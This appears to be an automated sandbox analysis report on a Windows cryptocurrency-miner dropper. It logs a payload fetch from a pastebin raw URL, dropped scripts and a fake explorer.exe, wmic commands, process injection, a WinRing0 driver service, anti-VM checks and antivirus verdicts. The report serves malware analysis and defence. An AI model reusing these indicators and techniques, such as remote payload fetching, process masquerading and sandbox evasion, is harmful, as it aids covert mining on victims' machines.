ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 50128528
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 50134480
registers.r11: 50130288
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1973703595
registers.r13: 0

Performs some HTTP requests (1 event)

request

GET https://pastebin.com/raw/GUqDzHQW

Allocates read-write-execute memory (usually to unpack itself) (11 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73982000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2452 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000074943000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000074943000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2892 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000074943000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2184 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000500000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2184 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002900000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2184 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a70000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 2, 2022, 9:26 a.m.	process_identifier: 2184 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a90000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (6 events)

file	C:\Windows (x86)\xcls.bat
file	C:\Windows (x86)\run.vbs
file	C:\Windows (x86)\version.bat
file	C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat
file	C:\Windows (x86)\xagal.exe
file	C:\Windows (x86)\explorer.exe

Creates a suspicious process (6 events)

cmdline	C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline	wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline	wmic csproduct get UUID /format:list
cmdline	C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list \|find "="
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat "C:\Windows (x86)\xagal.exe""
cmdline	wmic process where name='xagal.exe' delete

Drops a binary and executes it (4 events)

file	C:\Windows (x86)\xagal.exe
file	C:\Windows (x86)\run.vbs
file	C:\Windows (x86)\xcls.bat
file	C:\Windows (x86)\explorer.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 2, 2022, 9:26 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat "C:\Windows (x86)\xagal.exe"" filepath: C:\Windows\System32\cmd	1	1	0
ShellExecuteExW May 2, 2022, 9:26 a.m.	show_type: 0 filepath_r: C:\Windows (x86)\xcls.bat parameters: filepath: C:\Windows (x86)\xcls.bat	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (6 events)

Time & API	Arguments	Status	Return
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x000000000000025c process_name: SearchProtocolHost.exe process_identifier: 2688	1	1
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x000000000000025c process_name: svchost.exe process_identifier: 2560	1	1
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x000000000000025c process_name: conhost.exe process_identifier: 2332	1	1
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x000000000000025c process_name: taskhost.exe process_identifier: 2656	1	1
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000314 process_name: cmd.exe process_identifier: 1940	1	1
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000314 process_name: conhost.exe process_identifier: 296	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 2, 2022, 9:26 a.m.	flags: 15 family: 0		111	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x000000000000026c process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x0000000000000270 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x0000000000000274 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x0000000000000278 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x0000000000000290 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x0000000000000294 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x000000000000029c process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x0000000000000298 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002a4 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002a8 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002ac process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002a0 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002b4 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002b0 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002c0 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002c4 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002c8 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002cc process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:26 a.m.	snapshot_handle: 0x00000000000002d0 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002d4 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002d8 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002dc process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002e0 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002e8 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002e4 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002ec process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002f4 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002f0 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x00000000000002fc process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x000000000000013c process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000168 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000180 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000304 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000308 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x000000000000030c process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000310 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000314 process_name: conhost.exe process_identifier: 296		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000318 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000250 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000320 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000324 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000328 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x000000000000031c process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x000000000000032c process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000330 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000334 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x000000000000033c process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000338 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:27 a.m.	snapshot_handle: 0x0000000000000340 process_name: taskhost.exe process_identifier: 2656		0	0
Process32NextW May 2, 2022, 9:28 a.m.	snapshot_handle: 0x0000000000000348 process_name: taskhost.exe process_identifier: 2656		0	0

Potentially malicious URLs were found in the process memory dump (50 out of 127 events)

url	http://crl.comodo.net/TrustedCertificateServices.crl0
url	http://users.ocsp.d-trust.net03
url	http://crl.ssc.lt/root-b/cacrl.crl0
url	http://crl.securetrust.com/STCA.crl0
url	http://crl.securetrust.com/SGCA.crl0
url	http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url	http://www.ssc.lt/cps03
url	http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url	http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url	http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url	https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url	http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url	http://www.pkioverheid.nl/policies/root-policy0
url	http://cps.chambersign.org/cps/chambersroot.html0
url	http://www.e-szigno.hu/SZSZ/0
url	http://www.entrust.net/CRL/Client1.crl0
url	http://crl.chambersign.org/publicnotaryroot.crl0
url	https://xmrig.com/wizard
url	http://www.certplus.com/CRL/class3.crl0
url	http://logo.verisign.com/vslogo.gif0
url	http://www.acabogacia.org/doc0
url	http://www.disig.sk/ca/crl/ca_disig.crl0
url	https://www.catcert.net/verarrel
url	http://www.sk.ee/cps/0
url	http://www.quovadis.bm0
url	https://www.catcert.net/verarrel05
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url	https://L
url	http://crl.chambersign.org/chambersroot.crl0
url	https://H
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url	http://crl.globalsign.net/root-r2.crl0
url	http://certificates.starfieldtech.com/repository/1604
url	http://www.d-trust.net0
url	http://crl.comodo.net/AAACertificateServices.crl0
url	http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url	http://crl.ssc.lt/root-a/cacrl.crl0
url	http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url	http://www.certicamara.com/certicamaraca.crl0
url	http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url	http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url	http://www.post.trust.ie/reposit/cps.html0
url	http://www.d-trust.net/crl/d-trust_qualified_root_ca_1_2007_pn.crl0
url	http://www2.public-trust.com/crl/ct/ctroot.crl0
url	http://www.certicamara.com0
url	http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
url	http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
url	http://www.comsign.co.il/cps0
url	http://crl.usertrust.com/UTN-USERFirst-NetworkApplications.crl0

Yara rule detected in process memory (50 out of 115 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	WWW Cryptocurrency Miner Zero	rule	WWW_Cryptocurrency_Miner_Zero
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS
description	Perform crypto currency mining	rule	BitCoin
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Steal credential	rule	local_credential_Steal
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	File Downloader	rule	Network_Downloader
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Checks for the presence of known debug tools	rule	anti_dbgtools
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Disable Task Manager	rule	disable_taskmanager
description	Affect hook table	rule	win_hook
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	cmd /c del "C:\Windows (x86)\version.bat"
cmdline	C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline	wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline	wmic csproduct get UUID /format:list
cmdline	C:\Windows\System32\cmd /c "C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat "C:\Windows (x86)\xagal.exe""
cmdline	cmd /c del "C:\Windows (x86)\xcls.bat"
cmdline	C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list \|find "="
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat "C:\Windows (x86)\xagal.exe""
cmdline	wmic process where name='xagal.exe' delete

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW May 2, 2022, 9:26 a.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\Windows (x86)\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\Windows (x86)\WinRing0x64.sys desired_access: 983551 service_handle: 0x00000000003e2110 error_control: 1 service_type: 1 service_manager_handle: 0x00000000003e1f60	1	4071696	0

Deletes executed files from disk (3 events)

file	C:\Users\test22\AppData\Local\Temp\E474.tmp
file	C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat
file	C:\Windows (x86)\xagal.exe

Network communications indicative of possible code injection originated from the process explorer.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
WSASend May 2, 2022, 9:26 a.m.	buffer: ÅGÄ¼ ×m¾Jû©¯yw´-ù«P«ÑÏ æë\|#¿vT¨B#£Ò¬týÅÄöüò sL®]´>À,À0Ì©Ì¨ÌªÀ+À/À$À(kÀ#À'gÀ À9À À3=<5/ÿ # 0. + -3&$ úê&FÂ¯ê5¼ÒHH#eâR9ä¿o¸F socket: 588		0	0
WSASend May 2, 2022, 9:26 a.m.	buffer: E·ÎìÛüZ W°áèã8¦O »bVntãu2è¡F,0">=q¶?r¶·D}Å »?öô2ÈÓý0\uRNpùFýTÜ pü>7YÊ>ÿjÚêòÄ±ö£Ayi°(êC]L)¥EÊ #Ú&ïû/,¼AôÐíôWÃËè¤þW¾F?kÓ1aUJEehoÈCQ®³ðFU'W:G)qÐ¡z§¶aÊ=kðßìHÇsÛeÈ¹²rüýøÜ^Pd[û¢ éÅ4F2ê?ÔÕ´ldvK6ñ¤+5Å10Èa!FcñÄZàïQ´Aì¨_èwZ¥æÛ4P¦ëpá%P\v[ü%õÆzdÕßuYõÞ«ømVåï`×-Ë¡fOìÍÙcg5îç¶ÉxÔÕ.×éÏàÏûÖR5þ×X·®¤>ß½ÞÐ"Ç'ùrqÙTÄâdøpú/¯ÉÊ1ý¿1nóUÜ§Á=ã²P<ÈmLbrÔs\J®ïÒº#nÎa¤8'òÙaàmÌG e¤Â mö`Ñ±wÙù?ï¬W$;ÙÅå;Y¯êÔðåÌ'Ü¸O³#®6r->k¯Øuã&¨Ý+·Ù3léùåb¿kqNÝA~ØBÅLð{+%+>¹s:ö§à6núÎ0 ¦g ®j<0^ÌïéKÚêO^bªJ£v,hìr$º}»ÂÜ#®ïRò¬d¤¦@@«ÑÄ+«>c=E: Iù!(?Ix¼µe0êï×¤¬ÓÖ fÕ´q"ÛRJ¶Íÿ[*§Qñ¢æü_DeÙCx0Tõíçò_"£aÇºº¤ZV È¦{YÂ socket: 588		0	0

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Bkav	W32.AIDetect.malware2
ESET-NOD32	a variant of Win64/CoinMiner.IZ potentially unwanted
Paloalto	generic.ml
Kaspersky	Exploit.Win32.Certutil.tk
Avast	Win64:CoinminerX-gen [Trj]
McAfee-GW-Edition	BehavesLike.Win32.Generic.vc
SentinelOne	Static AI - Malicious SFX
Sophos	Generic ML PUA (PUA)
APEX	Malicious
Avira	HEUR/AGEN.1203240
Gridinsoft	Trojan.Win64.Downloader.oa!s1
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.gen
GData	Win32.Application.CoinMiner.Y
Cynet	Malicious (score: 100)
Malwarebytes	Malware.AI.2905941993
Rising	HackTool.CoinMiner!1.CB20 (CLASSIC:bWQ1Op2A7opEdvAj)
Fortinet	Riskware/CoinMiner
AVG	Win64:CoinminerX-gen [Trj]

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows (x86)\xcls.bat"
parent_process	wscript.exe				martian_process	C:\Windows (x86)\xcls.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2976 resumed a thread in remote process 2076
Process injection	Process 2076 resumed a thread in remote process 2284
Process injection	Process 2076 resumed a thread in remote process 2892
Process injection	Process 3060 resumed a thread in remote process 2184
Process injection	Process 3060 resumed a thread in remote process 2444
NtResumeThread May 2, 2022, 9:26 a.m.	thread_handle: 0x0000000000000204 suspend_count: 1 process_identifier: 2076	1	0	0
NtResumeThread May 2, 2022, 9:26 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 2284	1	0	0
NtResumeThread May 2, 2022, 9:26 a.m.	thread_handle: 0x00000000000001f4 suspend_count: 1 process_identifier: 2892	1	0	0
NtResumeThread May 2, 2022, 9:26 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 2184	1	0	0
NtResumeThread May 2, 2022, 9:26 a.m.	thread_handle: 0x0000000000000074 suspend_count: 0 process_identifier: 2444	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW May 2, 2022, 9:26 a.m.	thread_identifier: 2204 thread_handle: 0x0000000000000068 process_identifier: 2184 current_directory: filepath: C:\Windows (x86)\explorer.exe track: 1 command_line: "C:\Windows (x86)\explorer.exe" filepath_r: C:\Windows (x86)\explorer.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation May 2, 2022, 9:26 a.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

64a1.com

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All